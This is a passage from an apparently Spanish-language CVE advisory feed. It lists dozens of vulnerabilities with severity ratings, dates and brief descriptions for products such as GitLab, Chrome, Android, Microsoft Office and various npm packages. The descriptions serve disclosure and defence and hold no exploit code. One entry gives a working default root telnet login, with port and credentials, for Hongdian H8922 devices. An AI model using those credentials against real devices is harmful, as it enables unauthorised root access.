    Se ha descubierto un problema en NvmExpressDxe en el kernel versión 5.0 hasta la versión 5.5 de InsydeH2O. Debido a una desviación de puntero no fiable que provoca la corrupción de la memoria de SMM, un atacante podría ser capaz de escribir datos fijos o predecibles en la SMRAM. La explotación de este problema podría llevar a escalar privilegios a SMM
  • CVE-2022-23881
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que ZZZCMS zzzphp versión v2.1.0, contiene una vulnerabilidad de ejecución de comandos remota (RCE) por medio de la función danger_key() en el archivo zzz_template.php
  • CVE-2022-26279
    Severidad: ALTA
    Fecha de publicación: 24/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que EyouCMS versión v1.5.5, no presenta control de acceso en el componente /data/sqldata
  • CVE-2022-25571
    Severidad: MEDIA
    Fecha de publicación: 24/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Bluedon Information Security Technologies Co.,Ltd Internet Access Detector versión v1.0, contiene un filtrado de información que permite a atacantes acceder al contenido del archivo de contraseñas por medio de vectores no especificados
  • CVE-2022-27919
    Severidad: ALTA
    Fecha de publicación: 25/03/2022
    Fecha de última actualización: 08/08/2023
    Gradle Enterprise versiones anteriores a 2022.1, permite una ejecución de código remota si el proceso de instalación no especificó un archivo de configuración inicial. La configuración permite determinados accesos anónimos a la administración y a una API
  • CVE-2022-26198
    Severidad: ALTA
    Fecha de publicación: 26/03/2022
    Fecha de última actualización: 08/08/2023
    Notable versión v1.8.4, no filtra la edición de texto, permitiendo a atacantes ejecutar código arbitrario por medio de una carga útil diseñada inyectada en el campo Title text
  • CVE-2022-26205
    Severidad: ALTA
    Fecha de publicación: 27/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el commit 3686565726c65756e de Marky, presenta una vulnerabilidad de ejecución de código remota (RCE) por medio de los campos Display text. Esta vulnerabilidad permite a atacantes ejecutar código arbitrario por medio de la inyección de una carga útil diseñada
  • CVE-2021-20373
    Severidad: MEDIA
    Fecha de publicación: 09/12/2021
    Fecha de última actualización: 08/08/2023
    IBM Db2 versiones 9.7, 10.1, 10.5, 11.1 y 11.5, pueden ser vulnerables a una divulgación de información cuando es usada la utilidad LOAD, ya que en determinadas circunstancias la utilidad LOAD no aplica las restricciones de directorio. IBM X-Force ID: 199521
  • CVE-2021-28918
    Severidad: MEDIA
    Fecha de publicación: 01/04/2021
    Fecha de última actualización: 08/08/2023
    Una comprobación inapropiada de entrada de cadenas octales en el paquete netmask npm versiones v1.0.6 y anteriores, permite a atacantes remotos no autenticados llevar a cabo ataques de tipo SSRF, RFI y LFI indeterminados en muchos de los paquetes dependientes. Un atacante remoto no autenticado puede omitir unos paquetes que dependen de la máscara de red para filtrar las direcciones IP y llegar a hosts críticos de VPN o LAN.
  • CVE-2022-25568
    Severidad: MEDIA
    Fecha de publicación: 24/03/2022
    Fecha de última actualización: 08/08/2023
    MotionEye versiones v0.42.1 y anteriores, permiten a atacantes acceder a información confidencial por medio de una petición GET a /config/list. Para explotar esta vulnerabilidad, debe desconfigurarse la contraseña de un usuario normal
  • CVE-2022-1030
    Severidad: ALTA
    Fecha de publicación: 23/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que el cliente de acceso al servidor avanzado de Okta para Linux y macOS versiones anteriores a 1.58.0, era vulnerable a una inyección de comandos por medio de una URL especialmente diseñada. Un atacante, que presenta conocimiento de un nombre de equipo válido para la víctima y también conoce un host de destino válido donde el usuario presenta acceso, puede ejecutar comandos en el sistema local
  • CVE-2022-0735
    Severidad: ALTA
    Fecha de publicación: 28/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en GitLab CE/EE afectando a todas las versiones a partir de la 12.10 anteriores a 14.6.5, todas las versiones a partir de la 14.7 anteriores a 14.7.4, todas las versiones a partir de la 14.8 anteriores a 14.8.2. Un usuario no autorizado podía robar tokens de registro de corredores mediante una vulnerabilidad de divulgación de información usando comandos de acciones rápidas
  • CVE-2022-0331
    Severidad: MEDIA
    Fecha de publicación: 28/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de divulgación de información en Webadmin permite a un atacante remoto no autenticado leer el número de serie del dispositivo en Sophos Firewall versiones v18.5 MR2 y anteriores
  • CVE-2022-26255
    Severidad: ALTA
    Fecha de publicación: 27/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Clash for Windows versión v0.19.8, permite una ejecución de código arbitrario por medio de una carga útil diseñada inyectada en la columna de nombre de los proxies
  • CVE-2022-20002
    Severidad: MEDIA
    Fecha de publicación: 30/03/2022
    Fecha de última actualización: 08/08/2023
    En incfs, se presenta una posible forma de montar en rutas arbitrarias debido a una falta de comprobación de permisos. Esto podría conllevar a una escalada de privilegios local con los privilegios de ejecución System necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L, ID de Android: A-198657657
  • CVE-2021-39762
    Severidad: MEDIA
    Fecha de publicación: 30/03/2022
    Fecha de última actualización: 08/08/2023
    En tremolo, se presenta una posible lectura fuera de límites debido a un desbordamiento de enteros. Esto podría conllevar a una divulgación remota de información sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L, ID de Android: A-210625816
  • CVE-2021-39757
    Severidad: BAJA
    Fecha de publicación: 30/03/2022
    Fecha de última actualización: 08/08/2023
    En PermissionController, se presenta una posible omisión de permisos debido a un PendingIntent no seguro. Esto podría conllevar a una divulgación de información local con los privilegios de ejecución User necesarios. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12L, ID de Android: A-176094662
  • CVE-2022-26949
    Severidad: MEDIA
    Fecha de publicación: 29/03/2022
    Fecha de última actualización: 08/08/2023
    Archer versiones 6.x hasta 6.9 SP2 P1 (6.9.2.1) contiene una vulnerabilidad de control de acceso inapropiado en los archivos adjuntos. Un usuario malicioso autenticado de forma remota podría explotar esta vulnerabilidad para conseguir acceso a archivos que sólo deberían estar permitidos con privilegios adicionales
  • CVE-2021-31232
    Severidad: BAJA
    Fecha de publicación: 30/04/2021
    Fecha de última actualización: 08/08/2023
    Alertmanager en CNCF Cortex versiones anteriores a 1.8.1, presenta una vulnerabilidad de divulgación de archivos locales cuando es usado -experimental.alertmanager.enable-api. El archivo de contraseña de autenticación básica HTTP se puede usar como un vector de ataque para enviar cualquier contenido de archivo por medio de un webhook. Las plantillas de alertmanager pueden ser usados como vector de ataque para enviar cualquier contenido de archivo porque alertmanager puede cargar cualquier archivo de texto especificado en la lista de plantillas.
  • CVE-2019-11478
    Severidad: MEDIA
    Fecha de publicación: 18/06/2019
    Fecha de última actualización: 16/08/2023
    Jonathan Looney descubrió que la implementación de la cola de retransmisión de TCP en tcp_fragment en el kernel de Linux podría estar fragmentada cuando se manejan ciertas secuencias de Reconocimiento Selectivo (SACK) de TCP. Un atacante remoto podría usar esto para causar una denegación de servicio. Esto se ha corregido en versiones de kernel estables 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, y se corrige en el commit f070ef2ac66716357066b683fb0baf55f8191a2e.
  • CVE-2021-28152
    Severidad: ALTA
    Fecha de publicación: 06/05/2021
    Fecha de última actualización: 08/08/2023
    Los dispositivos Hongdian H8922 versión 3.0.5, presentan una función no documentada que permite el acceso a un shell como superusuario. Para conectarse, el servicio telnet es usado en el puerto 5188 con las credenciales predeterminadas root:superzxmn
  • Vulnerabilidad en Windows Container Manager Service de Microsoft (CVE-2021-31169)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios de Windows Container Manager Service. Este ID de CVE es diferente de CVE-2021-31165, CVE-2021-31167, CVE-2021-31168, CVE-2021-31208
  • Vulnerabilidad en Windows Container Manager de Microsoft (CVE-2021-31168)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Escalada de Privilegios del servicio de Windows Container Manager. Este ID de CVE es diferente de CVE-2021-31165, CVE-2021-31167, CVE-2021-31169, CVE-2021-31208
  • Vulnerabilidad en Microsoft Office (CVE-2021-31179)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Office. Este ID de CVE es diferente de CVE-2021-31175, CVE-2021-31176, CVE-2021-31177
  • Vulnerabilidad en Microsoft Office (CVE-2021-31176)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Office. Este ID de CVE es diferente de CVE-2021-31175, CVE-2021-31177, CVE-2021-31179
  • Vulnerabilidad en Microsoft Exchange Server (CVE-2021-31195)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Exchange Server. Este ID de CVE es diferente de CVE-2021-31198
  • CVE-2021-31194
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de OLE Automation
  • CVE-2021-28092
    Severidad: MEDIA
    Fecha de publicación: 12/03/2021
    Fecha de última actualización: 08/08/2023
    El paquete is-svg versiones 2.1.0 hasta 4.2.1 para Node.js, usa una expresión regular que es vulnerable a una Denegación de Servicio de Expresión Regular (ReDoS). Si un atacante proporciona una cadena maliciosa, is-svg se bloqueará al procesar la entrada durante mucho tiempo
  • CVE-2021-31185
    Severidad: BAJA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de denegación de servicio de Windows Desktop Bridge
  • Vulnerabilidad en Microsoft Office (CVE-2021-31175)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Microsoft Office. Este ID de CVE es diferente de CVE-2021-31176, CVE-2021-31177, CVE-2021-31179
  • Vulnerabilidad en Microsoft SharePoint (CVE-2021-31172)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Microsoft SharePoint. Este ID de CVE es diferente de CVE-2021-26418, CVE-2021-28478
  • Vulnerabilidad en Microsoft SharePoint (CVE-2021-28478)
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Microsoft SharePoint. Este ID de CVE es diferente de CVE-2021-26418, CVE-2021-31172
  • CVE-2021-31192
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de Windows Media Foundation Core
  • CVE-2021-31182
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad del controlador Microsoft Bluetooth
  • CVE-2021-26421
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Suplantación de Identidad de Skype Business y Lync
  • CVE-2021-31205
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Omisión de la Característica de Seguridad de Windows SMB Client
  • CVE-2021-31898
    Severidad: MEDIA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 08/08/2023
    En JetBrains WebStorm versiones anteriores a 2021.1, fueron usados peticiones HTTP en lugar de HTTPS
  • CVE-2021-25941
    Severidad: ALTA
    Fecha de publicación: 14/05/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "deep-override" versiónes 1.0.0 hasta 1.0.1, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2021-25943
    Severidad: ALTA
    Fecha de publicación: 14/05/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación del prototipo en "101" versiones 1.0.0 hasta 1.6.3, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2020-23851
    Severidad: MEDIA
    Fecha de publicación: 18/05/2021
    Fecha de última actualización: 17/08/2023
    Se presenta una vulnerabilidad de desbordamiento de búfer en la región stack de la memoria en ffjpeg versiones hasta el 02-07-2020 en la función jfif_decode(void *ctxt, BMP *pb) en el archivo ffjpeg/src/jfif.c: 513: 28, que podría causar una denegación de servicio mediante el envío de una imagen jpeg maliciosa
  • CVE-2020-23852
    Severidad: MEDIA
    Fecha de publicación: 18/05/2021
    Fecha de última actualización: 17/08/2023
    Se presenta una vulnerabilidad de desbordamiento de búfer en la región heap de la memoria en ffjpeg versiones hasta el 02-07-2020 en la función jfif_decode(void *ctxt, BMP *pb) en el archivo ffjpeg/src/jfif.c (línea 544 y línea 545), lo que podría causar una denegación de servicio mediante el envío de una imagen jpeg maliciosa
  • CVE-2021-31166
    Severidad: ALTA
    Fecha de publicación: 11/05/2021
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de Ejecución de Código Remota de HTTP Protocol Stack
  • CVE-2021-25944
    Severidad: ALTA
    Fecha de publicación: 25/05/2021
    Fecha de última actualización: 08/08/2023
    La vulnerabilidad de contaminación del prototipo en las versiones 1.0.0 hasta 1.0.5 de 'deep-defaults' permite al atacante causar una Denegación de Servicio y puede llevar a una ejecución de código remota
  • CVE-2021-25946
    Severidad: ALTA
    Fecha de publicación: 25/05/2021
    Fecha de última actualización: 08/08/2023
    La vulnerabilidad de contaminación del prototipo en las versiones 0.0.1 a 0.0.2 de "nconf-toml", permite al atacante causar una Denegación de Servicio y puede llevar a una ejecución de código remota
  • CVE-2021-23937
    Severidad: MEDIA
    Fecha de publicación: 25/05/2021
    Fecha de última actualización: 08/08/2023
    Un proxy DNS y una posible vulnerabilidad de ataque de amplificación en WebClientInfo de Apache Wicket permiten que un atacante active búsquedas de DNS arbitrarias desde el servidor cuando el encabezado X-Fordered-For no se sanea correctamente. Esta búsqueda de DNS puede ser diseñada para sobrecargar un servidor DNS interno o para ralentizar el procesamiento de peticiones de la aplicación Apache Wicket, lo que provoca una posible Denegación de Servicio en la infraestructura interna o en la propia aplicación web. Este problema afecta a Apache Wicket Apache Wicket 9.x versiones 9.2.0 y anteriores; Apache Wicket 8.x versiones 8.11.0 y anteriores; Apache Wicket 7.x versiones 7.17.0 y anteriores y Apache Wicket 6.x versiones 6.2.0 y posteriores
  • CVE-2021-28965
    Severidad: MEDIA
    Fecha de publicación: 21/04/2021
    Fecha de última actualización: 08/08/2023
    El REXML gem versiones anteriores a 3.2.5 en Ruby versiones anteriores a 2.6.7, versiones 2.7.x anteriores a 2.7.3 y versiones 3.x anteriores a 3.0.1, no aborda apropiadamente los problemas round-trip de XML. Puede ser producido un documento incorrecto después de analizarlo y serializarlo
  • CVE-2021-25326
    Severidad: BAJA
    Fecha de publicación: 09/04/2021
    Fecha de última actualización: 08/08/2023
    Skyworth Digital Technology RN510 versión V.3.1.0.4, está afectada por una vulnerabilidad de control de acceso incorrecta en el archivo /cgi-bin/test_version.asp. Si el Wi-Fi está conectado pero un usuario no autenticado visita una URL, es posible que se revelen la contraseña SSID y la contraseña de la Interfaz de Usuario web
  • CVE-2021-33838
    Severidad: MEDIA
    Fecha de publicación: 03/06/2021
    Fecha de última actualización: 08/08/2023
    Luca a través de la versión 1.7.4 en Android permite a los atacantes remotos obtener información sensible sobre el seguimiento de COVID-19 porque las solicitudes relacionadas con el Estado de Registro ocurren poco después de las solicitudes de Registro del Número de Teléfono.
  • CVE-2021-29662
    Severidad: MEDIA
    Fecha de publicación: 31/03/2021
    Fecha de última actualización: 08/08/2023
    El módulo Data::Validate::IP versiones hasta 0.29 para Perl, no considera apropiadamente los caracteres cero extraños al comienzo de una cadena de dirección IP, lo que (en algunas situaciones) permite a los atacantes omitir el control de acceso que se basa en direcciones IP.
  • CVE-2021-29424
    Severidad: MEDIA
    Fecha de publicación: 06/04/2021
    Fecha de última actualización: 08/08/2023
    El módulo Net::Netmask versiones anteriores a 2.0000 para Perl no considera apropiadamente los caracteres cero extraños al comienzo de una cadena de dirección IP, lo que (en algunas situaciones) permite a atacantes omitir el control de acceso basado en direcciones IP
  • CVE-2021-31249
    Severidad: MEDIA
    Fecha de publicación: 04/06/2021
    Fecha de última actualización: 08/08/2023
    Se encontró una vulnerabilidad de inyección de tipo CRLF en los dispositivos convertidores TCP/IP BF-430, BF-431 y BF-450M de CHIYU Technology Inc debido a una falta de comprobación en el parámetro redirect= disponible en múltiples componentes CGI
  • CVE-2021-0511
    Severidad: MEDIA
    Fecha de publicación: 21/06/2021
    Fecha de última actualización: 08/08/2023
    En la función Dex2oat del archivo dex2oat.cc, se presenta una posible forma de inyectar bytecode en una aplicación debido a una comprobación inapropiada de entrada. Esto podría conllevar a una escalada de privilegios local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-9 Android-10 Android-11, ID de Android: A-178055795
  • CVE-2021-23396
    Severidad: ALTA
    Fecha de publicación: 17/06/2021
    Fecha de última actualización: 08/08/2023
    Todas las versiones del paquete lutils son vulnerables a una Contaminación de Prototipos por medio de la función main (merge)
  • CVE-2021-23395
    Severidad: MEDIA
    Fecha de publicación: 15/06/2021
    Fecha de última actualización: 08/08/2023
    Esto afecta a todas las versiones del paquete nedb. La biblioteca podría ser engañada para añadir o modificar propiedades de Object.prototype usando un parámetro payload __proto__ o constructor.prototype
  • CVE-2021-28689
    Severidad: BAJA
    Fecha de publicación: 11/06/2021
    Fecha de última actualización: 08/08/2023
    x86: Vulnerabilidades especulativas con invitados PV de 32 bits desnudos (no shim) invitados de kernel PV de 32 bits x86 se ejecutan en el anillo 1. En el momento en que se desarrolló Xen, esta zona de la arquitectura i386 se usaba raramente, por lo que Xen pudo usarla para implementar la paravirtualización, el novedoso enfoque de Xen para la virtualización. En AMD64, Xen tuvo que usar un enfoque de implementación diferente, por lo que Xen no usa el anillo 1 para soportar invitados de 64 bits. Ahora que el foco está en los sistemas de 64 bits, y la disponibilidad de soporte de hardware explícito para la virtualización, arreglar los problemas de especulación en el anillo 1 no es una prioridad para las compañías de procesadores. Indirect Branch Restricted Speculation (IBRS) es una extensión de la arquitectura x86 creada para combatir los ataques de canal lateral de ejecución especulativa, incluido Spectre v2. Se ha adaptado en microcódigo a las CPU existentes. Para más detalles sobre Spectre v2, consulte:: http://xenbits.xen.org/xsa/advisory-254.html Sin embargo, IBRS no protege arquitectónicamente el anillo 0 de las predicciones aprendidas en el anillo 1. Para más detalles, véase: https://software.intel.com/security-software-guidance/deep-dives/deep-dive-indirect-branch-restricted-speculation Pueden darse situaciones similares con otras mitigaciones para otros tipos de ataques de ejecución especulativa. Es muy probable que la situación sea similar para los ataques de ejecución especulativa que aún no se han descubierto, divulgado o mitigado
  • CVE-2021-24000
    Severidad: BAJA
    Fecha de publicación: 24/06/2021
    Fecha de última actualización: 08/08/2023
    Una condición de carrera con las funciones requestPointerLock() y setTimeout() podría haber resultado en un usuario interactuando con una pestaña cuando creía que estaba en una pestaña separada. En conjunción con determinados elementos (como <input type="file">) esto podría haber conllevado a un ataque donde un usuario se confundiera sobre el origen de la página web y potencialmente revelara información que no pretendía. Esta vulnerabilidad afecta a Firefox versiones anteriores a 88
  • CVE-2021-22367
    Severidad: ALTA
    Fecha de publicación: 30/06/2021
    Fecha de última actualización: 08/08/2023
    Se presenta una Vulnerabilidad de Errores de Administración de Claves en el Smartphone de Huawei. Una explotación con éxito de esta vulnerabilidad puede conllevar a la evasión de la autenticación
  • CVE-2021-23993
    Severidad: MEDIA
    Fecha de publicación: 24/06/2021
    Fecha de última actualización: 08/08/2023
    Un atacante puede llevar a cabo un ataque DoS para impedir a un usuario de enviar un correo electrónico cifrado a un corresponsal. Si un atacante crea una clave OpenPGP diseñada con una subclave que presenta una autofirma no válida, y el usuario de Thunderbird importa la clave diseñada, entonces Thunderbird puede intentar usar la subclave no válida, pero la biblioteca RNP lo rechaza para ser usado, causando que el cifrado presente un fallo. Esta vulnerabilidad afecta a Thunderbird versiones anteriores a 78.9.1
  • CVE-2021-26099
    Severidad: MEDIA
    Fecha de publicación: 12/07/2021
    Fecha de última actualización: 08/08/2023
    Una falta de pasos criptográficos en el servicio de Cifrado Identity-Based de FortiMail versiones anteriores a 7.0.0 puede permitir a un atacante que entre en posesión de las claves maestras cifradas comprometer su confidencialidad al observar algunas propiedades invariables del texto cifrado
  • CVE-2021-1896
    Severidad: BAJA
    Fecha de publicación: 13/07/2021
    Fecha de última actualización: 08/08/2023
    Una configuración débil en la WLAN podría causar el reenvío de paquetes no cifrados de un cliente a otro en Snapdragon Compute, Snapdragon Connectivity
  • CVE-2021-25953
    Severidad: ALTA
    Fecha de publicación: 14/07/2021
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de contaminación de prototipos en "putil-merge" versiones 1.0.0 hasta 3.6.6, permite a un atacante causar una denegación de servicio y puede conllevar a una ejecución de código remota
  • CVE-2022-22934
    Severidad: MEDIA
    Fecha de publicación: 29/03/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en SaltStack Salt en versiones anteriores a 3002.8, 3003.4, 3004.1. Los maestros de Salt no firman los datos del pilar con la clave pública del minion, lo que puede resultar en que los atacantes sustituyan datos arbitrarios del pilar
  • CVE-2022-25348
    Severidad: MEDIA
    Fecha de publicación: 31/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de la ruta de búsqueda no confiable en AttacheCase versión 4.0.2.7 y anteriores, permite a un atacante alcanzar privilegios y ejecutar código arbitrario por medio de una DLL troyana en un directorio no especificado
  • CVE-2022-28128
    Severidad: MEDIA
    Fecha de publicación: 31/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de la ruta de búsqueda no confiable en AttacheCase versiones 3.6.1.0 y anteriores, permite a un atacante alcanzar privilegios y ejecutar código arbitrario por medio de una DLL troyana en un directorio no especificado
  • CVE-2022-26019
    Severidad: ALTA
    Fecha de publicación: 31/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de acceso inapropiado en pfSense CE y pfSense Plus (versiones de software de pfSense CE anteriores a 2.6.0 y versiones de software de pfSense Plus anteriores a 22.01) permite que un atacante remoto con el privilegio de cambiar la configuración del GPS NTP reescriba los archivos existentes en el sistema de archivos, lo que puede resultar en una ejecución de un comando arbitrario
  • CVE-2022-25915
    Severidad: MEDIA
    Fecha de publicación: 31/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de acceso inapropiado en los routers LAN de ELECOM (versiones de firmware WRC-1167GST2 v1.25 y anteriores, versiones de firmware WRC-1167GST2A v1.25 y anteriores, versiones de firmware WRC-1167GST2H v1.25 y anteriores, versiones de firmware WRC-2533GS2-B v1. 52 y anteriores, WRC-2533GS2-W versiones de firmware v1.52 y anteriores, WRC-1750GS versiones de firmware v1.03 y anteriores, WRC-1750GSV versiones de firmware v2.11 y anteriores, WRC-1900GST versiones de firmware v1.03 y anteriores, WRC-2533GST versiones de firmware v1. 03 y anteriores, WRC-2533GSTA versiones de firmware v1.03 y anteriores, WRC-2533GST2 versiones de firmware v1.25 y anteriores, WRC-2533GST2SP versiones de firmware v1.25 y anteriores, WRC-2533GST2-G versiones de firmware v1.25 y anteriores, y EDWRC-2533GST2 versiones de firmware v1.25 y anteriores) permite a un atacante autenticado adyacente a la red omitir la restricción de acceso y acceder a la pantalla de administración del producto por medio de vectores no especificados
  • CVE-2021-23362
    Severidad: MEDIA
    Fecha de publicación: 23/03/2021
    Fecha de última actualización: 08/08/2023
    El paquete hosted-git-info anterior a la versión 3.0.8 es vulnerable a la Denegación de Servicio por Expresión Regular (ReDoS) a través de la expresión regular shortcutMatch en la función fromUrl en index.js. La expresión regular afectada muestra una complejidad de tiempo polinómica en el peor de los casos
  • CVE-2022-26871
    Severidad: ALTA
    Fecha de publicación: 29/03/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de carga de archivos arbitrarios en Trend Micro Apex Central podría permitir a un atacante remoto no autenticado cargar un archivo arbitrario que podría conllevar a una ejecución de código remota
  • CVE-2021-1942
    Severidad: ALTA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    Un manejo inapropiado de los permisos de una región de memoria compartida puede conllevar a una corrupción de la memoria en Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
  • CVE-2022-24066
    Severidad: ALTA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    El paquete simple-git versiones anteriores a 3.5.0, es vulnerable a una inyección de comandos debido a una corrección incompleta de [CVE-2022-24433](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2421199) que sólo parchea contra el vector de ataque git fetch. Un uso similar de la función --upload-pack de git también es compatible con git clone, que la corrección anterior no cubría
  • CVE-2022-0610
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada de la API de Gamepad en Google Chrome versiones anteriores a 98.0.4758.102 permitía a un atacante remoto explotar potencialmente una corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-0455
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una implementación inapropiada en Full Screen Mode en Google Chrome en Android versiones anteriores a 98.0.4758.80, permitía a un atacante remoto falsificar el contenido de la Omnibox (barra de URL) por medio de una página HTML diseñada
  • CVE-2022-0470
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Un acceso a la memoria fuera de límites en V8 en Google Chrome versiones anteriores a 98.0.4758.80, permitía a un atacante remoto explotar potencialmente una corrupción de la pila por medio de una página HTML diseñada
  • CVE-2022-1174
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado una potencial vulnerabilidad DoS en Gitlab CE/EE versiones 13.7 anteriores a 14.7.7, todas las versiones a partir de 14.8 anteriores a 14.8.5, todas las versiones a partir de 14.9 anteriores a 14.9.2, que permitía a un atacante desencadenar un alto uso de la CPU por medio de una entrada especialmente diseñada añadida en Issues, Merge requests, Milestones, Snippets, Wiki pages, etc
  • CVE-2022-1185
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de denegación de servicio cuando son renderizados archivos RDoc en GitLab CE/EE versiones 10 a 14.7.7, 14.8.0 a 14.8.5 y 14.9.0 a 14.9.2, permite a un atacante bloquear la aplicación web de GitLab con un archivo RDoc maliciosamente diseñado
  • CVE-2022-24787
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 02/08/2023
    Vyper es un Lenguaje de Contratos Inteligentes de Python para la Máquina Virtual de Ethereum. En versiones 0.3.1 y anteriores, las cadenas de bytes pueden presentar bytes sucios, resultando en que las comparaciones palabra por palabra den resultados incorrectos. Incluso sin bytes sucios distintos de cero, dos bytestrings pueden compararse como iguales si uno termina con "\x00" porque no se presenta comparación de la longitud. Se presenta un parche disponible y es esperado que forme parte de la versión 0.3.2. Actualmente no se presentan medidas de mitigación conocidas
  • CVE-2022-1105
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de acceso inapropiado en GitLab CE/EE afectando a todas las versiones desde 13.11 hasta 14.7.7, 14.8 hasta 14.8.5 y 14.9 hasta 14.9.2, permite que un usuario no autorizado acceda a los análisis de canalizaciones incluso cuando las canalizaciones públicas están deshabilitadas
  • CVE-2022-1148
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una autorización inapropiada en GitLab Pages incluida en GitLab CE/EE afectando a todas las versiones desde la 11.5 anteriores a 14.7.7, 14.8 anteriores a 14.8.5 y 14.9 anteriores a 14.9.2, permitía a un atacante robar el token de acceso de un usuario en un sitio web privado de GitLab Pages controlado por el atacante y reusar ese token en otros sitios web privados de la víctima
  • CVE-2022-1111
    Severidad: BAJA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Un error de lógica empresarial en la Importación de Proyectos en GitLab CE/EE versiones 14.9 anteriores a 14.9.2, 14.8 anteriores a 14.8.5 y 14.0 anteriores a 14.7.7 causaba, en determinadas condiciones, que los proyectos importados mostraran un usuario incorrecto en la columna "Access Granted" de las páginas de pertenencia al proyecto
  • CVE-2022-26572
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Xerox ColorQube 8580 contiene un problema de control de acceso que permite a atacantes imprimir, visualizar el estado y obtener información confidencial
  • CVE-2022-22331
    Severidad: MEDIA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
    IBM SterlingPartner Engagement Manager versión 6.2.0, podría permitir a un atacante autenticado de forma remota obtener información confidencial o modificar los detalles del usuario, causado por una vulnerabilidad de objeto directo inseguro (IDOR). IBM X-Force ID: 219130
  • CVE-2022-0461
    Severidad: MEDIA
    Fecha de publicación: 04/04/2022
    Fecha de última actualización: 08/08/2023
    Una omisión de políticas en COOP en Google Chrome versiones anteriores a 98.0.4758.80, permitía a un atacante remoto omitir el sandbox de iframe por medio de una página HTML diseñada
  • CVE-2022-0373
    Severidad: BAJA
    Fecha de publicación: 01/04/2022
    Fecha de última actualización: 08/08/2023
